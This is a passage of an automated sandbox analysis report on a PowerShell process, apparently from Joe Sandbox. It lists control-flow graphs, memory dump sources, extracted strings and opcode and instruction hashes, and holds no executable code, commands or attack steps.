                                                                                                                  control_flow_graph 0 6e33ce8-6e33d0d 1 6e33d13-6e33d18 0->1 2 6e33f00-6e33f08 0->2 3 6e33d30-6e33d34 1->3 4 6e33d1a-6e33d20 1->4 10 6e33f0a-6e33f16 2->10 11 6e33eff 2->11 8 6e33eb0-6e33eba 3->8 9 6e33d3a-6e33d3c 3->9 6 6e33d22 4->6 7 6e33d24-6e33d2e 4->7 6->3 7->3 12 6e33ec8-6e33ece 8->12 13 6e33ebc-6e33ec5 8->13 14 6e33d3e-6e33d4a 9->14 15 6e33d4c 9->15 16 6e33f18-6e33f1d 10->16 17 6e33f1e-6e33f4a 10->17 11->2 18 6e33ed0-6e33ed2 12->18 19 6e33ed4-6e33ee0 12->19 21 6e33d4e-6e33d50 14->21 15->21 16->17 22 6e33f50-6e33f55 17->22 23 6e340ce-6e340d4 17->23 24 6e33ee2-6e33efd 18->24 19->24 21->8 25 6e33d56-6e33d75 21->25 26 6e33f57-6e33f5d 22->26 27 6e33f6d-6e33f71 22->27 40 6e340d6-6e340de 23->40 41 6e340cb 23->41 54 6e33d77-6e33d83 25->54 55 6e33d85 25->55 30 6e33f61-6e33f6b 26->30 31 6e33f5f 26->31 34 6e34080-6e3408a 27->34 35 6e33f77-6e33f79 27->35 30->27 31->27 36 6e34097-6e3409d 34->36 37 6e3408c-6e34094 34->37 38 6e33f7b-6e33f87 35->38 39 6e33f89 35->39 46 6e340a3-6e340af 36->46 47 6e3409f-6e340a1 36->47 45 6e33f8b-6e33f8d 38->45 39->45 42 6e340e0-6e340e4 40->42 43 6e340e6-6e34112 40->43 42->43 50 6e34228-6e34230 43->50 51 6e34118-6e3411d 43->51 45->34 52 6e33f93-6e33fb2 45->52 53 6e340b1-6e340ca 46->53 47->53 71 6e34232-6e3425d 50->71 72 6e34227 50->72 56 6e34135-6e34139 51->56 57 6e3411f-6e34125 51->57 86 6e33fc2 52->86 87 6e33fb4-6e33fc0 52->87 53->41 58 6e33d87-6e33d89 54->58 55->58 62 6e341da-6e341e4 56->62 63 6e3413f-6e34141 56->63 60 6e34127 57->60 61 6e34129-6e34133 57->61 58->8 65 6e33d8f-6e33d96 58->65 60->56 61->56 73 6e341f1-6e341f7 62->73 74 6e341e6-6e341ee 62->74 68 6e34143-6e3414f 63->68 69 6e34151 63->69 65->2 70 6e33d9c-6e33da1 65->70 75 6e34153-6e34155 68->75 69->75 78 6e33da3-6e33da9 70->78 79 6e33db9-6e33dc8 70->79 80 6e3428b-6e34295 71->80 81 6e3425f-6e34281 71->81 72->50 82 6e341f9-6e341fb 73->82 83 6e341fd-6e34209 73->83 75->62 85 6e3415b-6e3415d 75->85 88 6e33dab 78->88 89 6e33dad-6e33db7 78->89 79->8 102 6e33dce-6e33dec 79->102 91 6e34297-6e3429c 80->91 92 6e3429f-6e342a5 80->92 120 6e34283-6e34288 81->120 121 6e342d5-6e342fe 81->121 90 6e3420b-6e34225 82->90 83->90 95 6e34177-6e3417e 85->95 96 6e3415f-6e34165 85->96 97 6e33fc4-6e33fc6 86->97 87->97 88->79 89->79 93 6e342a7-6e342a9 92->93 94 6e342ab-6e342b7 92->94 103 6e342b9-6e342d2 93->103 94->103 106 6e34180-6e34186 95->106 107 6e34196-6e341d7 95->107 104 6e34167 96->104 105 6e34169-6e34175 96->105 97->34 108 6e33fcc-6e34003 97->108 102->8 127 6e33df2-6e33e17 102->127 104->95 105->95 111 6e3418a-6e34194 106->111 112 6e34188 106->112 130 6e34005-6e3400b 108->130 131 6e3401d-6e34024 108->131 111->107 112->107 133 6e34300-6e34326 121->133 134 6e3432d-6e3433e 121->134 127->8 148 6e33e1d-6e33e24 127->148 135 6e3400f-6e3401b 130->135 136 6e3400d 130->136 137 6e34026-6e3402c 131->137 138 6e3403c-6e3407d 131->138 133->134 146 6e34340-6e34344 134->146 147 6e34346-6e3435c 134->147 135->131 136->131 141 6e34030-6e3403a 137->141 142 6e3402e 137->142 141->138 142->138 146->147 150 6e34395-6e3439f 147->150 151 6e3435e-6e3437b 147->151 152 6e33e26-6e33e41 148->152 153 6e33e6a-6e33e9d 148->153 155 6e343a1-6e343a5 150->155 156 6e343a8-6e343ae 150->156 162 6e343e5-6e343ea 151->162 163 6e3437d-6e3438f 151->163 165 6e33e43-6e33e49 152->165 166 6e33e5b-6e33e5f 152->166 175 6e33ea4-6e33ead 153->175 158 6e343b0-6e343b2 156->158 159 6e343b4-6e343c0 156->159 164 6e343c2-6e343e2 158->164 159->164 162->163 163->150 169 6e33e4b 165->169 170 6e33e4d-6e33e59 165->170 171 6e33e66-6e33e68 166->171 169->166 170->166 171->175
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1707781552.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_6e30000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4'kq$4'kq$4'kq$4'kq
                                                                                                                  • API String ID: 0-1293621312
                                                                                                                  • Opcode ID: 71e4cbc2606078c7163daef4f45e4266ea0bc05cb0148713489e755d2630dacd
                                                                                                                  • Instruction ID: 1ba7598b01f1c6bb47c88086912339d375d8b5a785ee9770a95e813ff6679e4b
                                                                                                                  • Opcode Fuzzy Hash: 71e4cbc2606078c7163daef4f45e4266ea0bc05cb0148713489e755d2630dacd
                                                                                                                  • Instruction Fuzzy Hash: DC127B31B04365CFC7658B688908AABBBE2AFD1315F2484BAD505CF391DB32DD45CBA1

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 245 8126578-81265bb 246 81265c3-81265ef SetThreadToken 245->246 247 81265f1-81265f7 246->247 248 81265f8-8126615 246->248 247->248
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1709969495.0000000008120000.00000040.00000800.00020000.00000000.sdmp, Offset: 08120000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_8120000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ThreadToken
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3254676861-0
                                                                                                                  • Opcode ID: 7a7b2c7a5d61ef25c028447400850e86dfa5102840453d832dc72f7d273d68a0
                                                                                                                  • Instruction ID: e892360e749961f874bcf39b38e7bdd4ba5f1f2fb2efe1a9be473767e4b58a95
                                                                                                                  • Opcode Fuzzy Hash: 7a7b2c7a5d61ef25c028447400850e86dfa5102840453d832dc72f7d273d68a0
                                                                                                                  • Instruction Fuzzy Hash: 2B1146B19002588FCB10DF9DC584ADEFFF4AF48320F248469D459A7260C774A944CFA1

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 251 8126580-81265ef SetThreadToken 253 81265f1-81265f7 251->253 254 81265f8-8126615 251->254 253->254
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1709969495.0000000008120000.00000040.00000800.00020000.00000000.sdmp, Offset: 08120000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_8120000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ThreadToken
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3254676861-0
                                                                                                                  • Opcode ID: 016b3c29ace599c4a8caab8b563313dc1094e167b9ecabd124e249e95554bc8d
                                                                                                                  • Instruction ID: 0f4902d02b70a5be3cb7b2e92df4271e45f3eb5a357a8537ea6b9c16fd2f9298
                                                                                                                  • Opcode Fuzzy Hash: 016b3c29ace599c4a8caab8b563313dc1094e167b9ecabd124e249e95554bc8d
                                                                                                                  • Instruction Fuzzy Hash: F11125B19002588FCB10DF9AC984B9EFBF8EF48324F24842AD459A7260C774A944CFA4

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 257 4446fe0-4446fff 258 4447105-4447143 257->258 259 4447005-4447008 257->259 287 444700a call 4447697 259->287 288 444700a call 444767c 259->288 261 4447010-4447022 262 4447024 261->262 263 444702e-4447043 261->263 262->263 268 44470ce-44470e7 263->268 269 4447049-4447059 263->269 274 44470f2-44470f3 268->274 275 44470e9 268->275 272 4447065-4447073 call 444bf10 269->272 273 444705b 269->273 279 4447079-444707d 272->279 273->272 274->258 275->274 280 44470bd-44470c8 279->280 281 444707f-444708f 279->281 280->268 280->269 282 4447091-44470a9 281->282 283 44470ab-44470b5 281->283 282->280 283->280 287->261 288->261
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1702632552.0000000004440000.00000040.00000800.00020000.00000000.sdmp, Offset: 04440000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_4440000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: (oq
                                                                                                                  • API String ID: 0-3175707579
                                                                                                                  • Opcode ID: fccec812acec3b1062a87b3cb3e99b54aed5a51c561f62e0a0310155fef9915d
                                                                                                                  • Instruction ID: 88899bf01898dd26cde64aa0b868ef105ffff051df990e290933411ed98a2b80
                                                                                                                  • Opcode Fuzzy Hash: fccec812acec3b1062a87b3cb3e99b54aed5a51c561f62e0a0310155fef9915d
                                                                                                                  • Instruction Fuzzy Hash: C7415F74B052048FDB15DFA8C454AAEBBF2EF8D310F159499E406AB395DB31EC02CB64

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 289 444e610-444e6b6 297 444e6bc-444e6d3 289->297 298 444e73a-444e753 289->298 304 444e6db-444e738 297->304 301 444e755 298->301 302 444e75e 298->302 301->302 303 444e75f 302->303 303->303 304->297 304->298
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1702632552.0000000004440000.00000040.00000800.00020000.00000000.sdmp, Offset: 04440000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_4440000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: piIk
                                                                                                                  • API String ID: 0-4138124211
                                                                                                                  • Opcode ID: 25804107af5b935c9d3218c3c83fa6cd22ba4247ff3a58a50cba8515d3afffd5
                                                                                                                  • Instruction ID: ff54726a1da293626b8760a725173962bc514849f47ad76825c6ec3d939069d7
                                                                                                                  • Opcode Fuzzy Hash: 25804107af5b935c9d3218c3c83fa6cd22ba4247ff3a58a50cba8515d3afffd5
                                                                                                                  • Instruction Fuzzy Hash: F531A070A00245DFCB21DF79D994A9EBBF2FF88300F148569D815AB394DB34AD45CBA0

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 312 444e640-444e6b6 319 444e6bc-444e6d3 312->319 320 444e73a-444e753 312->320 326 444e6db-444e738 319->326 323 444e755 320->323 324 444e75e 320->324 323->324 325 444e75f 324->325 325->325 326->319 326->320
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1702632552.0000000004440000.00000040.00000800.00020000.00000000.sdmp, Offset: 04440000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_4440000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: piIk
                                                                                                                  • API String ID: 0-4138124211
                                                                                                                  • Opcode ID: 465748129c961fba9db2c3462e071b33b73cccc40c3f689ca65e912938ed015a
                                                                                                                  • Instruction ID: b20b4dcdcecf7c36fe499d0b794a067ad72c4653323a0d49989cf2fd51eccbb3
                                                                                                                  • Opcode Fuzzy Hash: 465748129c961fba9db2c3462e071b33b73cccc40c3f689ca65e912938ed015a
                                                                                                                  • Instruction Fuzzy Hash: AC317830A00205DFCB24DF69D994A9EBBF2FF88300F108569D41AA7794DB34AD49CBA0

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 334 444af98-444afa1 call 444a984 336 444afa6-444afaa 334->336 337 444afac-444afb9 336->337 338 444afba-444b055 336->338 345 444b057-444b05d 338->345 346 444b05e-444b07b 338->346 345->346
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1702632552.0000000004440000.00000040.00000800.00020000.00000000.sdmp, Offset: 04440000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_4440000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: (&kq
                                                                                                                  • API String ID: 0-3641282905
                                                                                                                  • Opcode ID: 3bead41bd7c5c951a6119db4ab0c4f2d1178dc9981f4c9076de67278b0070666
                                                                                                                  • Instruction ID: b89c63997813fb4ea7fe84ad0c5e125c05bac997395dfde0d791a5aecf60231e
                                                                                                                  • Opcode Fuzzy Hash: 3bead41bd7c5c951a6119db4ab0c4f2d1178dc9981f4c9076de67278b0070666
                                                                                                                  • Instruction Fuzzy Hash: 6521AE71A002588FDB24DFAED40469FBFF5EB88320F24846ED518A7350CB75A945CBE5

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 349 444d270-444d29c 351 444d29e 349->351 352 444d2a8-444d31b 349->352 351->352 362 444d347-444d34c 352->362 363 444d31d-444d32d 352->363 364 444d32f 363->364 365 444d339-444d33c 363->365 364->365 365->362
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1702632552.0000000004440000.00000040.00000800.00020000.00000000.sdmp, Offset: 04440000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_4440000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: </vl
                                                                                                                  • API String ID: 0-2513005275
                                                                                                                  • Opcode ID: 1ea3e7db718c426420d037b7daa12654c5e5ec0152deb936a49cfe69f9e77ed7
                                                                                                                  • Instruction ID: 1a929ee59af37f502ff717c4c69b2d1449e1089b983c2f786d6c7e00feb72205
                                                                                                                  • Opcode Fuzzy Hash: 1ea3e7db718c426420d037b7daa12654c5e5ec0152deb936a49cfe69f9e77ed7
                                                                                                                  • Instruction Fuzzy Hash: C721ACB07002409FDB10DB69D480E9ABBE6EF89354B0485AEE409CFB55DB34EC56CB90

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 366 444d280-444d29c 367 444d29e 366->367 368 444d2a8-444d31b 366->368 367->368 378 444d347-444d34c 368->378 379 444d31d-444d32d 368->379 380 444d32f 379->380 381 444d339-444d33c 379->381 380->381 381->378
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1702632552.0000000004440000.00000040.00000800.00020000.00000000.sdmp, Offset: 04440000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_4440000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: </vl
                                                                                                                  • API String ID: 0-2513005275
                                                                                                                  • Opcode ID: f845711abef142f500abd2f77583e771fef87a1a81895f72302560a61b753a8c
                                                                                                                  • Instruction ID: fd20f3815680552db754e080b988b1553eff567e4e6617bac19d460fabe7980b
                                                                                                                  • Opcode Fuzzy Hash: f845711abef142f500abd2f77583e771fef87a1a81895f72302560a61b753a8c
                                                                                                                  • Instruction Fuzzy Hash: A021A9B07002409FEB00DF69C980E5ABBE6EF89354B04C5AEE409CBB65DB34ED05CB90

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 382 44490ce-4449127 390 4449131 call 4449158 382->390 391 4449131 call 4449168 382->391 387 4449137-4449154 call 4448a50 390->387 391->387
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1702632552.0000000004440000.00000040.00000800.00020000.00000000.sdmp, Offset: 04440000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_4440000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: P
                                                                                                                  • API String ID: 0-3110715001
                                                                                                                  • Opcode ID: c78db81ccfbd9dbd847f770a25b3e7e4d94881c58d1f8d7de056228402fd766c
                                                                                                                  • Instruction ID: bf5e5f67f32918d8b911bcfb87fbfd705a91ab7f8a7ce36da0a9786df51301bf
                                                                                                                  • Opcode Fuzzy Hash: c78db81ccfbd9dbd847f770a25b3e7e4d94881c58d1f8d7de056228402fd766c
                                                                                                                  • Instruction Fuzzy Hash: CA01F4B5B082844FE706AB788429B9BBFA2DFC2304F1480EFC4058B696CE781905CB91

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 392 444dc88-444dcad 395 444dcb6 392->395 396 444dcaf 392->396 397 444dcbe-444dcc8 395->397 396->395 399 444dcca call 444dce8 397->399 400 444dcca call 444dcd9 397->400 398 444dcd0-444dcd3 399->398 400->398
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1702632552.0000000004440000.00000040.00000800.00020000.00000000.sdmp, Offset: 04440000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_4440000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: +/gn^
                                                                                                                  • API String ID: 0-1003393348
                                                                                                                  • Opcode ID: 57ec72bf746d7a90d1131ba827df6fcf1213067068462277623029a262be3c28
                                                                                                                  • Instruction ID: faeed1004fc8c49307c73653319ab686c68e5fc50db9a15e8ba2e4f2c5769c5e
                                                                                                                  • Opcode Fuzzy Hash: 57ec72bf746d7a90d1131ba827df6fcf1213067068462277623029a262be3c28
                                                                                                                  • Instruction Fuzzy Hash: FFE02272E0465017CB12A22EB80199F7BDACFC5271B01006BE81987740EE98E80487E6

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 401 444dc98-444dcad 403 444dcb6-444dcc8 401->403 404 444dcaf 401->404 407 444dcca call 444dce8 403->407 408 444dcca call 444dcd9 403->408 404->403 406 444dcd0-444dcd3 407->406 408->406
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1702632552.0000000004440000.00000040.00000800.00020000.00000000.sdmp, Offset: 04440000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_4440000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: +/gn^
                                                                                                                  • API String ID: 0-1003393348
                                                                                                                  • Opcode ID: a144b4ab2cd83578660f5bdd0843e1d793dfa65d7218b90123579e7fa5722b33
                                                                                                                  • Instruction ID: 2ade4d82c462d8e975de87f8e46f7dac942ab478f9320134887a4717772343c2
                                                                                                                  • Opcode Fuzzy Hash: a144b4ab2cd83578660f5bdd0843e1d793dfa65d7218b90123579e7fa5722b33
                                                                                                                  • Instruction Fuzzy Hash: B0E0C271B00B10178A12A76EA80085FB7EBDFC4671301402FE51AC7700EFA8EC0547E5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1702632552.0000000004440000.00000040.00000800.00020000.00000000.sdmp, Offset: 04440000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_4440000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: fd594d5b49b16f5174388f9bb96116271eb88ee796671bab7bb803c3ad745de1
                                                                                                                  • Instruction ID: 51a184d02bdbada23f2e058bf42ddff615647cd9e9ac970817f75077841467f3
                                                                                                                  • Opcode Fuzzy Hash: fd594d5b49b16f5174388f9bb96116271eb88ee796671bab7bb803c3ad745de1
                                                                                                                  • Instruction Fuzzy Hash: 76917D74A002058FCB15CF59C5989AEFBB1FF88314B2485AAE815AB3A5C735FC51CFA0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1707781552.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_6e30000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: af481b5fa8e27095df5436145d7ed33888482c0f0afc4aec1df751da0649dc38
                                                                                                                  • Instruction ID: 6534dda734a18f6f9be0556442b04e4637ae0927bb9aaadd2322dd99560b4d06
                                                                                                                  • Opcode Fuzzy Hash: af481b5fa8e27095df5436145d7ed33888482c0f0afc4aec1df751da0649dc38
                                                                                                                  • Instruction Fuzzy Hash: 91517B71B043659FC761DB6889096ABBBF2AF85210F0484BED685CF252DE31CE45C7A2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1702632552.0000000004440000.00000040.00000800.00020000.00000000.sdmp, Offset: 04440000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_4440000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: dafc7d71283edae018ee70839b8e4dae81223508f816405a632c4e36ebd47112
                                                                                                                  • Instruction ID: b0f038870b92a4b7bccd96e414ffccbd38af7960d356eba28a5f2e17c402a1ff
                                                                                                                  • Opcode Fuzzy Hash: dafc7d71283edae018ee70839b8e4dae81223508f816405a632c4e36ebd47112
                                                                                                                  • Instruction Fuzzy Hash: E851D3303042059FEB14DB69D854A6BBBEAFFC8364B2544BAE509DB351EB31EC02CB50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1702632552.0000000004440000.00000040.00000800.00020000.00000000.sdmp, Offset: 04440000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_4440000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ef7a713ce4740f92da76c975c150b5f60282fbacc7f3a174696dca65f489467b
                                                                                                                  • Instruction ID: a4f6ac8f14a3b82ce86cb226fd2931eb69e1f6f0519c1ef42ed2a6b8e5455a31
                                                                                                                  • Opcode Fuzzy Hash: ef7a713ce4740f92da76c975c150b5f60282fbacc7f3a174696dca65f489467b
                                                                                                                  • Instruction Fuzzy Hash: 76610871E002489FDF14CFA9C584A9DFBF5EF88314F14816AE819AB364EB74AD45CB50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1707781552.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_6e30000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 13e157c56a0db83fdabfd9358b5918575feb040ea6d25f25a4ce6367c72be75a
                                                                                                                  • Instruction ID: 8be297cb6622c4263cf368c2e19fa9d7214d98a2eeb8b5162e4b4e4872920719
                                                                                                                  • Opcode Fuzzy Hash: 13e157c56a0db83fdabfd9358b5918575feb040ea6d25f25a4ce6367c72be75a
                                                                                                                  • Instruction Fuzzy Hash: EC517B31B40325DFDB509F7899486EAB7E1FF84324F048479EA818F291DB35CA85C7A1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1702632552.0000000004440000.00000040.00000800.00020000.00000000.sdmp, Offset: 04440000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_4440000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9aeef5f43e3909add7a191320ab09b9a95c4b73c8171b5ae40f0ed84786d5f6f
                                                                                                                  • Instruction ID: 928e8c063b4bdfb12123fa612baf5a60fd642d711c6813ea68851613c7f32322
                                                                                                                  • Opcode Fuzzy Hash: 9aeef5f43e3909add7a191320ab09b9a95c4b73c8171b5ae40f0ed84786d5f6f
                                                                                                                  • Instruction Fuzzy Hash: 11510571E002889FDB54CFA9C584A9DFBF5EF88314F14806AE819AB364EB74A945CB50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1702632552.0000000004440000.00000040.00000800.00020000.00000000.sdmp, Offset: 04440000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_4440000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b6b82f9f01b8823b1e6bd4ad3e24cf79f8b1c6525b3ad5b193c42162ee8d0759
                                                                                                                  • Instruction ID: 8c9f6d58be2b5d7d57898324a104f264fe5b6a1020ce50313335d8143114232b
                                                                                                                  • Opcode Fuzzy Hash: b6b82f9f01b8823b1e6bd4ad3e24cf79f8b1c6525b3ad5b193c42162ee8d0759
                                                                                                                  • Instruction Fuzzy Hash: 9E515274B002058FEF24DF69C59496ABBE6FFC8314B1584AAE549DB325EB74EC018B90
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1702632552.0000000004440000.00000040.00000800.00020000.00000000.sdmp, Offset: 04440000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_4440000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3cd6e9dac6cb1e0dfeff5e17c61c04d4bd7437686d5581926e875ed42e954102
                                                                                                                  • Instruction ID: 7453e72b37e0df33b3eabc1644e8775a70b17ec7441e5c667fd9f7a9bb724742
                                                                                                                  • Opcode Fuzzy Hash: 3cd6e9dac6cb1e0dfeff5e17c61c04d4bd7437686d5581926e875ed42e954102
                                                                                                                  • Instruction Fuzzy Hash: 4F4140747002058FEF14DF6DC59496ABBE6FFC8314B2584AAE549DB329EB34EC018B50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1702632552.0000000004440000.00000040.00000800.00020000.00000000.sdmp, Offset: 04440000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_4440000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a31223687d929cf59a5b1ea11a6e35db79f189affa29f5e343816a190b43965a
                                                                                                                  • Instruction ID: 114be8344c36875720dbc32aaa76c43dc936010fe15efa46de8ccc90636d104c
                                                                                                                  • Opcode Fuzzy Hash: a31223687d929cf59a5b1ea11a6e35db79f189affa29f5e343816a190b43965a
                                                                                                                  • Instruction Fuzzy Hash: 81514871E002489FDB14DFA9D984A9EFBF5FF88314F14816AE818AB751DB30AD44CB91
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1707781552.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_6e30000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 22bacde406c9784eb2281855ceed77f535bd0051857c25946a00c51cf97155ae
                                                                                                                  • Instruction ID: 5db3c79a4f3ccafd9cb895a1f8406a57aa25926e72ed1fd4d082601d487794f9
                                                                                                                  • Opcode Fuzzy Hash: 22bacde406c9784eb2281855ceed77f535bd0051857c25946a00c51cf97155ae
                                                                                                                  • Instruction Fuzzy Hash: 9E414731E08361CFCB608F158604EA6BBB2AF80249F5454A6D9018F751D735DD45CBA1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1702632552.0000000004440000.00000040.00000800.00020000.00000000.sdmp, Offset: 04440000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_4440000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3cff3cb6f2db60c752a5db7a26ce005099de728e5a27e2a711b4be9cc491690b
                                                                                                                  • Instruction ID: 9f51896ddc6c82e6dcb9ebadaade41ec79788255033f51f6a4721a242e3023f2
